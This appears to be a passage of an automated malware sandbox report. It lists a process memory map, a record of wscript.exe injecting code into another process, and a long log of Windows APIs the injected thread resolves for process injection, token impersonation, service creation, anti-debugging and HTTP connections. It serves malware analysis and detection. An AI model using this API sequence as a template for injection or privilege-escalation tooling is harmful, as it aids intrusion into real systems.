private_0x0000000006bd0000 0x06bd0000 0x06dd3fff Private Memory Readable, Writable True False False -
private_0x0000000006de0000 0x06de0000 0x06fdffff Private Memory Readable, Writable True False False -
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x72a60000 0x72a7efff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x72a80000 0x72a99fff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x72aa0000 0x72ac7fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x72ad0000 0x72aeffff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x72af0000 0x72afffff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x72b00000 0x72b5ffff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x72b60000 0x72c06fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x72c10000 0x72c20fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x72c30000 0x72c37fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x72c40000 0x72c85fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x72c90000 0x72c9afff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x72ca0000 0x72cedfff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x72cf0000 0x72d02fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x72d10000 0x72d25fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x72d30000 0x72d41fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x72d50000 0x72d57fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x72d60000 0x72d8ffff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x72d90000 0x72e13fff Memory Mapped File Readable, Writable, Executable False False False -
sppc.dll 0x72e20000 0x72e3cfff Memory Mapped File Readable, Writable, Executable False False False -
dxgi.dll 0x72e40000 0x72ebdfff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x72ec0000 0x72ee0fff Memory Mapped File Readable, Writable, Executable False False False -
dcomp.dll 0x72ef0000 0x72f8bfff Memory Mapped File Readable, Writable, Executable False False False -
d3d11.dll 0x72f90000 0x731a2fff Memory Mapped File Readable, Writable, Executable False False False -
twinapi.dll 0x731b0000 0x73248fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x73250000 0x73391fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x733b0000 0x733defff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x733e0000 0x733f2fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x73400000 0x73407fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x73410000 0x736d0fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x736e0000 0x736fafff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73700000 0x73718fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x73720000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x738f0000 0x73af8fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x73b00000 0x73b09fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x73b20000 0x73d43fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x740f0000 0x7410cfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74110000 0x74184fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74190000 0x74220fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74760000 0x75b1efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x75c40000 0x75c83fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x75cf0000 0x75d31fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x75d40000 0x75dbafff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75dc0000 0x75e03fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76280000 0x7630cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x763b0000 0x76441fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76470000 0x764cbfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x764d0000 0x769acfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x76cf0000 0x76ea9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76eb0000 0x76ebbfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76ec0000 0x77034fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77040000 0x77046fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x77050000 0x7705efff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x77060000 0x7706dfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False -
sysmain.sdb 0x7eb90000 0x7ef1ffff Memory Mapped File Readable False False False -
private_0x000000007ef21000 0x7ef21000 0x7ef23fff Private Memory Readable, Writable True False False -
private_0x000000007ef24000 0x7ef24000 0x7ef26fff Private Memory Readable, Writable True True False
private_0x000000007ef27000 0x7ef27000 0x7ef29fff Private Memory Readable, Writable True True False
private_0x000000007ef2a000 0x7ef2a000 0x7ef2cfff Private Memory Readable, Writable True True False
private_0x000000007ef2d000 0x7ef2d000 0x7ef2ffff Private Memory Readable, Writable True True False
pagefile_0x000000007ef30000 0x7ef30000 0x7f02ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f030000 0x7f030000 0x7f052fff Pagefile Backed Memory Readable True False False -
private_0x000000007f054000 0x7f054000 0x7f056fff Private Memory Readable, Writable True True False
private_0x000000007f057000 0x7f057000 0x7f059fff Private Memory Readable, Writable True False False -
private_0x000000007f05a000 0x7f05a000 0x7f05cfff Private Memory Readable, Writable True False False -
private_0x000000007f05d000 0x7f05d000 0x7f05dfff Private Memory Readable, Writable True False False -
private_0x000000007f05f000 0x7f05f000 0x7f05ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb3d30ffff Private Memory Readable True False False -
pagefile_0x00007dfb3d310000 0x7dfb3d310000 0x7ffb3d30ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #7: c:\windows\system32\wscript.exe 0x250 address = 0x210000, size = 207872 True 1
Fn
Data
Create Remote Thread #7: c:\windows\system32\wscript.exe 0x250 address = 0x210000 True 1
Fn
Threads
Thread 0xc78
418 464
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76be61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileA, address_out = 0x76bdc240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileA, address_out = 0x76be6270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteProcThreadAttributeList, address_out = 0x75fdc160 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x771cda90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UpdateProcThreadAttribute, address_out = 0x75fd7f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76bd25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76bd7910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x76c00a00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x76c02a00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x76c029a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x76bd9620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76bd8c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x76be5f30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeProcThreadAttributeList, address_out = 0x75fd80b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x76c02ae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadContext, address_out = 0x76bdeb70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadContext, address_out = 0x76c02700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76bd98f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Thread32First, address_out = 0x76be4a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Thread32Next, address_out = 0x76be2430 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76bd2af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenThread, address_out = 0x76bd8780 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76be7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76bd9fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SuspendThread, address_out = 0x76bded00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 0x76bda280 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PeekNamedPipe, address_out = 0x76c01c40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitNamedPipeA, address_out = 0x76bfe290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetNamedPipeHandleState, address_out = 0x76c02600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76bd8840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76bd87c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileA, address_out = 0x76bdc510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32First, address_out = 0x76bded60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32Next, address_out = 0x76bdc8e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileA, address_out = 0x76be6210 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToSystemTime, address_out = 0x76be65f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesA, address_out = 0x76be6310 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x76c00da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76bdec30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToTzSpecificLocalTime, address_out = 0x76be4910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFullPathNameA, address_out = 0x76be63c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76bd9700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76bd9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeA, address_out = 0x76bfdde0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76bd7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76bd75c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x76c00820 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76bd2da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x76be6380 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryA, address_out = 0x76c00ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x76bd0570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryW, address_out = 0x76bda470 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76bd2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76bd9730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCurrentDirectoryA, address_out = 0x76c02500 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76be62a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x76c00ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76bd2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c00960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76bd92b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76be6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x76be6550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76be6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76be6170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76bd1d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c02560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x76bde360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76be2230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76bddb10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x76be64f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76bd79b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76bdf930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76bd9a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76bdfc20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x76bd8c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76bd9560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76c026a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76be6920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76be6880 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76be6910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76bde240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x771e4f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76bda090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76bd9fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DebugBreak, address_out = 0x76c00b30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76bd9ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76bd2dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76bda3b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76bda0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76bdfd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76bd9a60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76bd8770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76bd77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x76bdf4b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76be57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStrings, address_out = 0x76c01090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsA, address_out = 0x76c00e20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76be6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76be6390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76bd9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76be74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76be61a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76be6140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryA, address_out = 0x76be64d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76bd1b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76bda3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76bd2b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c028e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76bda2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76bda790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76bd9950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76bdd940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771e9920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x771d5e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771d5e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x771cbae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76bda060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76bda040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76bd1ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76bd9a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76bd1da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76bd9930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76bd7520 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76bd7560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76be6020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76bd9a80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76bd75a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76be6860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76be6870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76be4ca0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x75d636d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x75d606a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x75d5ee90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessWithLogonW, address_out = 0x75d77170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DeleteService, address_out = 0x75d75e30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x75d60ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x75d60c00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LogonUserA, address_out = 0x75d74330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x75d5f8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x75d604a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RevertToSelf, address_out = 0x75d60af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x75d5f0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x75d60c20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidA, address_out = 0x75d73510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x75d5ed40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x75d5f570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x75d5f870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserA, address_out = 0x75d637c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x75d60680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x75d755f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatusEx, address_out = 0x75d64680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateNamedPipeClient, address_out = 0x75d760f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x75d60ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x75d73e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x75d5ed20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceA, address_out = 0x75d76590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerA, address_out = 0x75d60f30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x75d639f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessWithTokenW, address_out = 0x75d61340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceA, address_out = 0x75d76a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceA, address_out = 0x75d75670 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x73b20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x73b9acb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x73bbb730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryDataAvailable, address_out = 0x73b74320 True 1
